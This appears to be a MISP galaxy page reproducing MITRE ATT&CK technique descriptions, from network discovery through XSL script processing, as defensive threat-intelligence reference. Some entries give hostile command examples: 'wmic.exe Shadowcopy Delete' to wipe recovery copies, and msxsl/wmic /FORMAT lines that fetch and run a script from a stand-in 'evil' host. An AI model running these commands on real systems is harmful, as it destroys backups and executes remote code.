Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp, ipconfig/ifconfig, nbtstat, and route.

Adversaries may also leverage a Network Device CLI on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. show ip route, show ip interface).[US-CERT-TA18-106A][Mandiant APT41 Global Intrusion ]

Adversaries may use the information from System Network Configuration Discovery during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.

Internal MISP references

UUID adb6b8c1-2bdb-42b9-95da-5ce07e8796f7 which can be used as unique global reference for System Network Configuration Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

System Network Connections Discovery

Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.

An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.[Amazon AWS VPC Guide][Microsoft Azure Virtual Network Overview][Google VPC Overview] Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.

Utilities and commands that acquire this information include netstat, "net use," and "net session" with Net. In Mac and Linux, netstat and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to "net session". Additionally, built-in features native to network devices and Network Device CLI may be used (e.g. show ip sockets, show tcp brief).[US-CERT-TA18-106A]

Internal MISP references

UUID 0d258912-58b1-4982-b90f-eed576f05ffc which can be used as unique global reference for System Network Connections Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

System Owner/User Discovery

Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping. The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Various utilities and commands may acquire this information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. Environment variables, such as %USERNAME% and $USER, may also be used to access this information.

On network devices, Network Device CLI commands such as show users and show ssh can be used to display users currently logged into the device.[show_ssh_users_cmd_cisco][US-CERT TA18-106A Network Infrastructure Devices 2018]

Internal MISP references

UUID 86e6f1f0-290b-4971-b50e-80e98a0a768b which can be used as unique global reference for System Owner/User Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

System Script Proxy Execution

Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.[LOLBAS Project] This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.[GitHub Ultimate AppLocker Bypass List]

Internal MISP references

UUID e0d1825e-e46a-48f2-9b28-8346a39d39b0 which can be used as unique global reference for System Script Proxy Execution in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
source MITRE
Related clusters

To see the related clusters, click here.

System Service Discovery

Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as sc query, tasklist /svc, systemctl --type=service, and net start.

Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Internal MISP references

UUID e0a347e2-2ac5-458b-ab0f-18d81b6d6055 which can be used as unique global reference for System Service Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

System Services

Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence (Create or Modify System Process), but adversaries can also abuse services for one-time or temporary execution.

Internal MISP references

UUID a2300ed3-a502-4fe4-bad5-4aa1efc72941 which can be used as unique global reference for System Services in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

System Shutdown/Reboot

Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. reload).[Microsoft Shutdown Oct 2017][alert_TA18_106A]

Shutting down or rebooting systems may disrupt access to computer resources for legitimate users while also impeding incident response/recovery.

Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as Disk Structure Wipe or Inhibit System Recovery, to hasten the intended effects on system availability.[Talos Nyetya June 2017][Talos Olympic Destroyer 2018]

Internal MISP references

UUID 24787dca-6afd-4ab3-ab6c-32e9486ec418 which can be used as unique global reference for System Shutdown/Reboot in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

System Time Discovery

An adversary may gather the system time and/or time zone settings from a local or remote system. The system time is set and stored by services, such as the Windows Time Service on Windows or systemsetup on macOS.[MSDN System Time][Technet Windows Time Service][systemsetup mac time] These time settings may also be synchronized between systems and services in an enterprise network, typically accomplished with a network time server within a domain.[Mac Time Sync][linux system time]

System time information may be gathered in a number of ways, such as with Net on Windows by performing net time \hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz.[Technet Windows Time Service] In addition, adversaries can discover device uptime through functions such as GetTickCount() to determine how long it has been since the system booted up.[Virtualization/Sandbox Evasion]

On network devices, Network Device CLI commands such as show clock detail can be used to see the current time configuration.[show_clock_detail_cisco_cmd]

In addition, system calls – such as time() – have been used to collect the current time on Linux devices.[MAGNET GOBLIN] On macOS systems, adversaries may use commands such as systemsetup -gettimezone or timeIntervalSinceNow to gather current time zone information or current date and time.[System Information Discovery Technique][ESET DazzleSpy Jan 2022]

This information could be useful for performing other techniques, such as executing a file with a Scheduled Task/Job[RSA EU12 They're Inside], or to discover locality information based on time zone to assist in victim targeting (i.e. System Location Discovery). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.[AnyRun TimeBomb]

Internal MISP references

UUID 2e634ff1-a4ea-41b4-8ee9-23db4627a986 which can be used as unique global reference for System Time Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Taint Shared Content

Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.

A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses Shortcut Modification of directory .LNK files that use Masquerading to look like the real directories, which are hidden through Hidden Files and Directories. The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. [Retwin Directory Share Pivot]

Adversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.

Internal MISP references

UUID 58987d0d-2ebf-4783-90ac-5164fe9b9e43 which can be used as unique global reference for Taint Shared Content in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Template Injection

Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.[Microsoft Open XML July 2017]

Properties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.

Adversaries may abuse these templates to initially conceal malicious code to be executed via user documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded.[SANS Brian Wiltse Template Injection] These documents can be delivered via other techniques such as Phishing and/or Taint Shared Content and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched.[Redxorblue Remote Template Injection] Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.[MalwareBytes Template Injection OCT 2017]

Adversaries may also modify the *\template control word within an .rtf file to similarly conceal then download malicious code. This legitimate control word value is intended to be a file destination of a template file resource that is retrieved and loaded when an .rtf file is opened. However, adversaries may alter the bytes of an existing .rtf file to insert a template control word field to include a URL resource of a malicious payload.[Proofpoint RTF Injection][Ciberseguridad Decoding malicious RTF files]

This technique may also enable Forced Authentication by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt.[Anomali Template Injection MAR 2018][Talos Template Injection July 2017][ryhanson phishery SEPT 2016]

Internal MISP references

UUID 02b8e7c1-0db7-43f5-a5bc-531b30395122 which can be used as unique global reference for Template Injection in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Traffic Signaling

Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. Port Knocking), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.

Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).

The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r [Hartrell cd00r 2002], is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.

On network devices, adversaries may use crafted packets to enable Network Device Authentication for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities. Adversaries may use crafted packets to attempt to connect to one or more (open or closed) ports, but may also attempt to connect to a router interface, broadcast, and network address IP on the same port in order to achieve their goals and objectives.[Cisco Synful Knock Evolution][Mandiant - Synful Knock][Cisco Blog Legacy Device Attacks] To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage Patch System Image due to the monolithic nature of the architecture.

Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.[Bleeping Computer - Ryuk WoL][AMD Magic Packet]

Internal MISP references

UUID c2cf211a-9676-4922-a386-69697ab4934a which can be used as unique global reference for Traffic Signaling in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Transfer Data to Cloud Account

Adversaries may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service.

A defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.[TLDRSec AWS Attacks]

Adversaries may also use cloud-native mechanisms to share victim data with adversary-controlled cloud accounts, such as creating anonymous file sharing links or, in Azure, a shared access signature (SAS) URI.[Microsoft Azure Storage Shared Access Signature]

Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.[DOJ GRU Indictment Jul 2018]

Internal MISP references

UUID ab4f22d6-465f-4a16-8a40-693f2234c4ac which can be used as unique global reference for Transfer Data to Cloud Account in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Google Workspace', 'IaaS', 'Office 365', 'SaaS']
source MITRE
Related clusters

To see the related clusters, click here.

Trusted Developer Utilities Proxy Execution

Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.[engima0x3 DNX Bypass][engima0x3 RCSI Bypass][Exploit Monday WinDbg][LOLBAS Tracker] These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.

Internal MISP references

UUID 8811114c-a0cf-479c-b95d-c036467749e3 which can be used as unique global reference for Trusted Developer Utilities Proxy Execution in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Trusted Relationship

Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.

Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, Valid Accounts used by the other party for access to internal network systems may be compromised and used.[CISA IT Service Providers]

In Office 365 environments, organizations may grant Microsoft partners or resellers delegated administrator permissions. By compromising a partner or reseller account, an adversary may be able to leverage existing delegated administrator relationships or send new delegated administrator offers to clients in order to gain administrative control over the victim tenant.[Office 365 Delegated Administration]

Internal MISP references

UUID 7549c2f9-b5d2-4773-90ed-42f668aecacf which can be used as unique global reference for Trusted Relationship in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Unsecured Credentials

Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. Bash History), operating system or application-specific repositories (e.g. Credentials in Registry), or other specialized files/artifacts (e.g. Private Keys).[Brining MimiKatz to Unix]

Internal MISP references

UUID 02ed857b-ba39-4fab-b1d9-3ed2aa689dfd which can be used as unique global reference for Unsecured Credentials in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Containers', 'Google Workspace', 'IaaS', 'Linux', 'macOS', 'Network', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Unused/Unsupported Cloud Regions

Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.

Cloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected.

A variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity.

An example of adversary use of unused AWS regions is to mine cryptocurrency through Resource Hijacking, which can cost organizations substantial amounts of money over time depending on the processing power used.[CloudSploit - Unused AWS Regions]

Internal MISP references

UUID edf9f7d7-bc14-4e25-800d-f508acb580d4 which can be used as unique global reference for Unused/Unsupported Cloud Regions in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS']
source MITRE
Related clusters

To see the related clusters, click here.

Use Alternate Authentication Material

Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls.

Authentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.[NIST Authentication][NIST MFA]

Caching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system—either in memory or on disk—it may be at risk of being stolen through Credential Access techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.

Internal MISP references

UUID 28f65214-95c1-4a72-b385-0b32cbcaea8f which can be used as unique global reference for Use Alternate Authentication Material in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers', 'Google Workspace', 'IaaS', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

User Execution

An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of Phishing.

While User Execution frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after Internal Spearphishing.

Adversaries may also deceive users into performing actions such as enabling Remote Access Software, allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to Steal Web Session Cookies; or downloading and executing malware for User Execution.[Talos Roblox Scam 2023][Krebs Discord Bookmarks 2023]

For example, tech support scams can be facilitated through Phishing, vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or Remote Access Software.[Telephone Attack Delivery]

Internal MISP references

UUID b84435ab-2ff4-4b6f-ba71-b4b815474872 which can be used as unique global reference for User Execution in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers', 'IaaS', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Valid Accounts

Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.[volexity_0day_sophos_FW] Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.

In some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.[CISA MFA PrintNightmare]

The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.[TechNet Credential Theft]

Internal MISP references

UUID a9b7eb2f-63e7-41bc-9d77-f7c4cede5406 which can be used as unique global reference for Valid Accounts in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Containers', 'Google Workspace', 'IaaS', 'Linux', 'macOS', 'Network', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Video Capture

An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.

Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from Screen Capture due to use of specific devices or applications for video recording rather than capturing the victim's screen.

In macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. [objective-see 2017 review]

Internal MISP references

UUID 0c81e13a-3608-4171-8075-9f70b2934028 which can be used as unique global reference for Video Capture in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Virtualization/Sandbox Evasion

Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors.[Deloitte Environment Awareness]

Adversaries may use several methods to accomplish Virtualization/Sandbox Evasion such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.[Unit 42 Pirpi July 2015]

Internal MISP references

UUID 63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8 which can be used as unique global reference for Virtualization/Sandbox Evasion in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Weaken Encryption

Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. [Cisco Synful Knock Evolution]

Encryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.

Adversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as Modify System Image, Reduce Key Space, and Disable Crypto Hardware, an adversary can negatively effect and/or eliminate a device’s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. [Cisco Blog Legacy Device Attacks]

Internal MISP references

UUID 8cf19b3d-c9fa-4d71-a6ab-dc0e236e57d4 which can be used as unique global reference for Weaken Encryption in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Network']
source MITRE
Related clusters

To see the related clusters, click here.

Web Service

Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).

Internal MISP references

UUID a729feee-8e21-444e-8eea-2ec595b09931 which can be used as unique global reference for Web Service in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Windows Management Instrumentation

Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.[WMI 1-3] WMI is an administration feature that provides a uniform environment to access Windows system components.

The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model and Windows Remote Management.[WMI 1-3] Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.[WMI 1-3] [Mandiant WMI]

An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as Execution of commands and payloads.[Mandiant WMI] For example, wmic.exe can be abused by an adversary to delete shadow copies with the command wmic.exe Shadowcopy Delete (i.e., Inhibit System Recovery).[WMI 6]

Note: wmic.exe is deprecated as of January of 2024, with the WMIC feature being “disabled by default” on Windows 11+. WMIC will be removed from subsequent Windows releases and replaced by PowerShell as the primary WMI interface.[WMI 7,8] In addition to PowerShell and tools like wbemtool.exe, COM APIs can also be used to programmatically interact with WMI via C++, .NET, VBScript, etc.[WMI 7,8]

Internal MISP references

UUID c37795d9-8970-461f-9491-3086d6b4b69a which can be used as unique global reference for Windows Management Instrumentation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
source MITRE
Related clusters

To see the related clusters, click here.

XSL Script Processing

Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. [Microsoft XSLT Script Mar 2017]

Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to Trusted Developer Utilities Proxy Execution, the Microsoft common line transformation utility binary (msxsl.exe) [Microsoft msxsl.exe] can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. [Penetration Testing Lab MSXSL July 2017] Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. [Reaqta MSXSL Spearphishing MAR 2018] Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.[XSL Bypass Mar 2019]

Command-line examples:[Penetration Testing Lab MSXSL July 2017][XSL Bypass Mar 2019]

  • msxsl.exe customers[.]xml script[.]xsl
  • msxsl.exe script[.]xsl script[.]xsl
  • msxsl.exe script[.]jpeg script[.]jpeg

Another variation of this technique, dubbed “Squiblytwo”, involves using Windows Management Instrumentation to invoke JScript or VBScript within an XSL file.[LOLBAS Wmic] This technique can also execute local/remote scripts and, similar to its Regsvr32/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in Windows Management Instrumentation provided they utilize the /FORMAT switch.[XSL Bypass Mar 2019]

Command-line examples:[XSL Bypass Mar 2019][LOLBAS Wmic]

  • Local File: wmic process list /FORMAT:evil[.]xsl
  • Remote File: wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”
Internal MISP references

UUID 4eb755e6-41f1-4c92-b14d-87a61a446258 which can be used as unique global reference for XSL Script Processing in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
source MITRE
Related clusters

To see the related clusters, click here.